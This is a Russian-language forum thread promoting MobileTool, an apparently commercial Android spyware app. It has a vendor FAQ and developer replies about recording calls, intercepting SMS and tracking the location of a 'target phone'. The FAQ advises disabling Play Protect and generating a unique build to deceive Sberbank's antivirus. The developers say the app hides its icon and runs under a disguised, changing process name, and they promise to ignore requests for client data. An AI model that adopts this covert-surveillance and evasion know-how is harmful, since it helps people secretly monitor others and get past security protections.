В редких случаях программа может не записывать голосовые звонки на некоторых моделях телефонов. Это связано с их аппаратными и программными функциями, которые отличаются от спецификаций Android (неисчерпывающий список: Google Pixel, Nexus 6P, Nexus 6, Nexus 5X, Nexus 5, Nexus 4, Moto G4, HTC M7).
Только обычные звонки могут быть записаны, звонки через Wi-Fi не могут быть записаны, поэтому, если ваш телефон поддерживает функцию звонков через Wi-Fi, пожалуйста, отключите ее.

Если на вашем телефоне установлена версия Android 9 Pie, качество записи будет очень низким или отсутствует, решение состоит в том, чтобы активировать динамик.

Вот ответ одного из владельцев Samsung на Android 10.


Сбербанк
Многие пользователи имеют проблемы с одновременной работой МТ и Сбербанк. Здесь собраны обьяснения и рекомендации по этой проблеме.
1. Известно, что Сбербанк убивает все приложения, у которых есть права на чтение SMS. На большинстве систем это приводит к тому, что программа работает нестабильно, либо просто остается убитой навсегда (приходится переустанавливать).
2. Известно, что в Сбербанк встроен антивирус, который тоже может определить МТ, как опасное приложение.
3. При первом запуске МТ ищет Сбербанк среди установленных. Если он его находит, то в окне логина не запрашивает права на чтение SMS. На всякий случай лучше самому проверить не установлено ли что-то от сбера, т.к. программ у них несколько, названия разные, и МТ может что-то пропустить.
4. Для обмана антивируса, встроенного в Сбербанк, можно сгенерировать оригинальную версию приложения. Это можно сделать в разделе кабинета "Создать приложение". Меняйте обязательно название при создании нового приложения.


Не пришел платеж
Здравствуйте,

Обратите внимание на то, что данная информация есть в инструкции по эксплуатации (с которой вы должны были ознакомиться):

Система оплаты нашего сервиса устроена следующим образом: есть компания-посредник - которой вы оплачиваете за услуги, она проверяет платеж, и если все в порядке, сотрудники компании запускают скрипт, который начислит вам дни. Мы, в свою очередь, не принимаем участия в этом процессе.

Если в течение 3 РАБОЧИХ дней оплата так и не прошла, тогда вам нужно обратится в техническую поддержку не нашего сервиса, а сервиса, через который вы оплачивали:

Если платили через FREEKASSA:
Раздел контакты, на сайте https://www.free-kassa.ru/. (кнопка «По совершенному платежу»)

Если платили через INTERKASSA:
Пишите в чат (снизу справа) на их сайте https://www.interkassa.com/.

Сотрудники платежного сервиса проверят все данные по вашему платежу и при необходимости свяжутся с нашей командой. в 99% случаев проблемы решаются на стороне платежного сервиса, очень редко когда проблема с наше1й стороны. Ни один платеж без внимания не останется. В противном случае вам вернут ваши деньги в связи с неоказанием услуги.

Если сотрудники FREEKASSA или INTERKASSA отказались вам помочь:**

Вы фотографируете всю переписку между вами и сотрудниками
Фотографируете данные о совершенном платеже
Присылаете нам всю информацию
Мы свяжемся с руководством системы и выясним почему вам отказали в помощи. Обычно до этого не доходит.


Проблемы со стабильностью
Профильный сайт
На сайте собраны рекомендации по настройке смартфонов от различных производителей с целью не дать умирать приложениям, которые работают в фоновом режиме. Проблема массовая.
Сайт уже не обновляется какое-то время, но все еще содержит много актуальной информации.
Не убивайте мое приложение!

Общие рекомендации
В Настройках безопасности Вашего смартфона дайте программе необходимые разрешения на:
а) показ Уведомлений (по желанию, лучше выключить)
б) работу в Фоновом режиме
в) доступ к интернету
г) «Автозапуск», и т.д.

Эти «Настройки» могут называться по-разному на разных моделях смартфонов.
Добавьте MobileTool в исключения (или белый список) в антивирусах и программах для очистки памяти.
Отключите PlayProtect в настройках PlayStore.

Конфликтующие программы
Обратите внимание на «Приложения-оптимизаторы», которые мешает нормальной работе смартфона. Уверяем вас, что разработчики «Android» уделяют огромное внимание оптимизации и скорости работы устройств. Сторонняя помощь программ-оптимизаторов не идёт на пользу быстродействию телефона, зато помогает распространять рекламу и платные услуги.
Если такое приложение у вас всё же установлено, необходимо разрешить постоянную работу MobileTool (добавить в исключения) в нём.

Xiaomi (большинство моделей)
В «Настройках» смартфона - "Приложения" - "MobileTool" - выделить «Автозапуск». Затем, в меню "Безопасность" - раздел «Энергосбережение» - необходимо добавить «MobileTool» в исключения.
В «Настройках» смартфона - закрепите MobileTool для запрета закрытия приложения.

Xiaomi Redmi 3 Pro
В разделе «Безопасность и разрешения» - перейти в «Автозапуск» и выделить «MobileTool». Также можно выставить эти «Настройки» в разделе «Безопасность и разрешения», если перейти в «Разрешения».

MIUI 7
На моделях смартфонов с оболочкой MIUI 7 (и подобных) меню «Настройки» смартфона, относящихся к «Безопасности», сделано в виде отдельного приложения «АВТОЗАПУСК» - войдите в это приложение и настройте там «Автозапуск» для «MobileTool».

Huawei с оболочкой EMUI
В меню «Батарея» или «Энергосбережение» - включите «Работа после выкл. Экрана».
Вы также можете обнаружить в «Настройках» смартфона пункт «Защищенные Приложения» –необходимо разрешить программе работать после перехода в «Спящий режим» или режим работы в «Фоновых задачах»."

Huawei P20 / P20 Lite / P20 Pro
В «Настройках» смартфона – в разделе «энергосбережение» добавьте «MobileTool» в исключения;
Проверьте, что выданы все необходимые Приложению разрешения в разделе «Права» в настройках Смартфона.

Meizu
В «Настройках» смартфона выбираем «Устройство» - меню «Управление питанием» - «Энергопотребление» - пункт «Оптимизация Энергопотребления» - «Управление спящим режимом» или «Фоновым режимом» - необходимо добавить «MobileTool».
Не забудьте разрешить «Автозапуск» «MobileTool» во вкладке «Разрешения».

ZenFone
В «Настройках» смартфона - меню «Менеджер автозапуска» (также это меню может называться просто «Автозапуск» или «Автозагрузка»), добавьте в него «MobileTool» и закрепите.

Asus (большинство моделей)
Если на телефоне стоит системное приложение «Менеджер автозапуска» («Auto start manager»/ «mobile manager» /или похожее), - в нем разрешите «Автозапуск» «MobileTool».
Необходимо разрешить работу программы в фоновом режиме и отключите ограничения режима «Энергосбережение» для «MobileTool» – обычно требует добавить программу в Исключения.
Закрепите MobileTool для запрета закрытия приложения.

Lenovo (большинство моделей)
В «Настройках» смартфона - «Энергосбережение» (или «батарея»/ «диспетчер питания» и т.п.) и добавляем «MobileTool» в исключения для режима «Энергосбережение», что позволит программе работать в фоновом (спящем) режиме.
На некоторых моделях бывает предустановлено приложение «SecureIT». Если в списке программ есть такое, откройте его, и в разделе Ускорение (Speed-up) добавьте «MobileTool» в список исключений.
На некоторых моделях бывает предустановлено приложение «Lenovo Power» (или «Power» / «Power Manager»). Необходимо войти в это приложение и проверить возможность добавить «MobileTool» в список исключений для режима «Энергосбережение» (либо выключить этот режим вовсе), а также разрешить «MobileTool» работать в «Фоновом режиме».

Fly (большинство моделей)
Проверьте в «Настройках» смартфона - пункт «Энергосбережение» - отключите этот режим, или добавьте «MobileTool» в список исключений для этого режима.

Highscreen Power Five
В «Настройках» смартфона: проверьте, что Приложению выдано разрешение на доступ к интернету без ограничений и добавьте Приложение в белый список.


Как задавать вопросы
Те, кто пишет, что прога не работает, "зависает" и прочее. Пожалуйста, отписывайтесь, читали ли Вы разделы "Проблемы со стабильностью", "FAQ" и "Установка" в шапке и что делали по этому поводу. Для китайщины есть спойлер про HUAWEI... IDS тоже желательно прикладывать.
А то вопросы "у меня не работает, что делать?" просто засоряют ветку, т.к. ответ адекватный на них дать нельзя.


Прикрепленные файлы

Прикрепленный файлmt25.200.apk ( 1 МБ )
Прикрепленный файлmt25.200_root.apk ( 2.09 МБ )


Сообщение отредактировал Dr. Olaf - 10.07.23, 15:55
Причина редактирования: Лого



Реп: (34)
Ну и цены



Реп: (8)
Ardzhan @ 02.12.2013, 09:01 *
Ну и цены


Людям нравится... Функционал и удобство использования соответствующие.



Реп: (81)
Батарею сильно жрёт?



Реп: (8)
kvorus @ 02.12.2013, 12:09 *
Батарею сильно жрёт?


Терпимо. Зависит от аппарата. Если 3G и может данные быстро отправить, то не сильно.
Приложение поднимается раз в 15 минут, чтобы записать координаты и раз в час, чтобы слить данные на сервер, ну и остальная активность по командам с админского телефона или запись звонков и всего остального.
В любом случае, есть возможность бесплатного тестирования в течение 2-х дней.



Реп: (34)
Так а чем оно лучше Droid Watcher или Reptilicus?



Реп: (0)
Нужно заметить, что в Droid Watcher, ShadowCopy и Reptilicus для многих функций нужны root права, а если зарутить телефон про гарантийный ремонт можно забыть :yes2: В mobiletool такая политика не используется, Тем более не за горами выход приложения под Windows Mobile, Iphone, Symbian.

Сообщение отредактировал MobileTool - 02.12.13, 19:01



Реп: (0)
пользуюсь руптиликусом, никаких рут прав нет, поставил на офф андрод и кастомный все работает как часы т никто денег не просит.



Реп: (0)
Тарифная сетка Mobiletool изменилась, теперь любой пользователь сам задает удобный период пользования приложением, тем самым экономя свой бюджет в системе. Ознакомиться с новыми тарифами можно тут http://mobiletool.ru/czenyi.html



Реп: (0)
rebornweb @ 03.12.2013, 07:36 *
пользуюсь руптиликусом, никаких рут прав нет, поставил на офф андрод и кастомный все работает как часы т никто денег не просит.


У них приложение с рут правами и без рут, то что без рут,- ничем от нашего не отличается по функционалу, но наше приложение более удобное в плане эксплуатации, и мы гарантируем полную анономность наших клиентов. Любой запрос на получение данных о наших клиентах игнорируется, как нами так и нашим хостером.

Мы можем работать с организациями, на законных оффициальных условиях, у нас есть оффициальный ответ о законности нашей деятельности из министерства юстиции.

Руптиликус платный, оплата взымается только за смс отправленные через сервис. Причем для разных регионов разная цена. У нас же цена одна. 0,5$ в день, количество дней выбираете сами. Нужно пару дней в месяц воспользоватся - тратьте всего пару дней!



Реп: (-1)
Как програма выдает себя не целевом телефоне? Где хранятся логи, записи и в каком формате?

Имеется ввиду как, под каким названием светится в диспетчере приложений и светится ли вообще?



Реп: (8)
juniori @ 11.12.2013, 10:11 *
Как програма выдает себя не целевом телефоне?

Программа, естественно, есть в диспетчере задач, но называется там совершенно по другому. Иконка из меню запуска удаляется.
Писать, как называется в диспетчере, здесь не буду, чтобы в поиск не попало. В любом случае, будем менять периодически это название и иконку.
Рекомендую установить и посмотреть. При установке Вы увидите иконку программы в титуле, а потом найдете ее в диспетчере.

juniori @ 11.12.2013, 10:11 *
Где хранятся логи, записи и в каком формате?

Логи хранятся в защищенной области данных, доступной только данному приложению. Для пользователя это не заметно, только если он root эксплорером не шарит в поисках. Логи хранятся в разных форматах (аудио, текст, база данных), но на диске ничего не шифруется. Данные шифруются только для передачи на сервер.



Реп: (0)
В нашем сервисе внедрена новая опция (Гостевой доступ), которая позволяет нескольким пользователям иметь доступ к одному телефону, причем администратор телефона 1, а остальные могут только просматривать данные разрешенные администратором.

Опция будет полезна для корпоративных клиентов.



Реп: (0)
В нашем сервисе внедрена новая опция Планировщик (доступная в добавлении и редактировании телефона), которая позволяет нескольким пользователям более детально, по времени, настроить сбор данных с телефона, при этом сэкономив трафик.

Опция будет полезна для корпоративных клиентов, чтоб собирать данные только в рабочее время.



Реп: (0)
Запись звонков с линии или микрофона? Есть ли возможность записи звонков с сохранением на карту памяти, для сброса на PC, и не по интернету?



Реп: (8)
EretiK007 @ 20.12.2013, 22:35 *
Запись звонков с линии или микрофона? Есть ли возможность записи звонков с сохранением на карту памяти, для сброса на PC, и не по интернету?


1. Запись звонков ведется с микрофона, т.к. в подавляющем большинстве телефонов эта функция реализована (разрешена) производителем. В подавляющем большинстве телефонов запись с линии отключена на уровне прошивки, хотя в API эта функция заявлена.
Во некоторых телефонах действительно плохо слышно собеседника (зависит чисто от конструкции телефона). В этом случае помогает сжатие динамического диапазона записи в SoundForge, например.
В любом случае, мы предлагаем 2 дня на тесты, чтобы понять, устраивает ли качество.

2. Весь обмен данными ведется через сервер. С сервера записи можно скачать на PC.

Сообщение отредактировал vold_by - 21.12.13, 15:47



Реп: (0)
В общем звонки пишет через раз, слышно только хозяина, собеседника нет. Звонки с некоторых номеров пишет, но звука нет вообще. Смс перехватывает быстро, даже каким-то образом появилась смс принятая до установки программы.
Функция удаленного диктофона: запись пришла, но на ней тишина.... Программка вроде и работает, но ещё совсем сырая. Не стоит она таких денег, имхо.



Реп: (8)
EretiK007 @ 21.12.2013, 15:52 *
В общем звонки пишет через раз, слышно только хозяина, собеседника нет. Звонки с некоторых номеров пишет, но звука нет вообще. Смс перехватывает быстро, даже каким-то образом появилась смс принятая до установки программы.
Функция удаленного диктофона: запись пришла, но на ней тишина.... Программка вроде и работает, но ещё совсем сырая. Не стоит она таких денег, имхо.


Я очень надеюсь, что Вы не клон конкурентов, которые уже пытались в этой ветке устроить дискуссию по поводу цен, но были вычищены модераторами, поэтому отвечу.

Все подобные приложения устроены примерно одинаково и используют одни и те же функции API Android, т.е. имеют одинаковые возможности и ограниченя. Отличие только в способах предоставления данных (СМС, WEB, E-mail и т.д.).

Поэтому "пишет звонки через раз" - это как-то странно (никто в поддержку с такой проблемой ни разу не обращался), хотя могу допустить, что на каком-то устройстве так и есть, хотя на "дохленьком" самсунге с 600 МГц процом все нормально работает.

"Звука нет вообще, тишина" - тоже было, т.к. на некоторых телефонах даже запись с микрофона запрещена на уровне прошивки или реализована нестандартным способом. "Не слышно собеседника" - зависит только от конструкции телефона, когда запись идет с микрофона. Встречался телефон, где собеседника было слышно лучше, чем хозяина.

Все эти проблемы будут одинаково проявляться на всех подобных приложениях в одинаковых условиях использования, т.к. существуют ограничения чисто на уровне прошивки, поэтому мы и предлагаем тестовый период, чтобы можно было убедиться, что качество сервиса устраивает.



Сообщение отредактировал vold_by - 21.12.13, 19:38



Реп: (0)
Не клон. Телефон HTC Desire V. Некоторые звонки программа не отмечает вообще, а некоторые пишет без звука. Могу дать IDS. По крайней мере у одного из ваших конкурентов все шло без сбоев.

Сообщение отредактировал EretiK007 - 22.12.13, 00:16



Реп: (8)
EretiK007 @ 22.12.2013, 00:15 *
Не клон. Телефон HTC Desire V. Некоторые звонки программа не отмечает вообще, а некоторые пишет без звука. Могу дать IDS. По крайней мере у одного из ваших конкурентов все шло без сбоев.

Пишите в поддержку на сайт.

Я несколько приложений конкурентов разобрал и везде запись была реализована одинаковым образом. Если не секрет, на каком приложении работает без сбоев? Будем перенимать опыт, если будет что перенимать.


Сообщение отредактировал vold_by - 22.12.13, 14:53



Реп: (81)
MobileTool @ 10.12.2013, 16:04 *
У нас же цена одна. 0,5$ в день, количество дней выбираете сами. Нужно пару дней в месяц воспользоватся - тратьте всего пару дней!


Т.е я могу поставить программы и забыть про неё, а в случае утери или кражи воспользоваться для поиска устройства оплатив сколько мне понадобится дней?


Полная версия   Текстовая версия

Помощь   Правила

Сейчас: 28.03.24, 17:08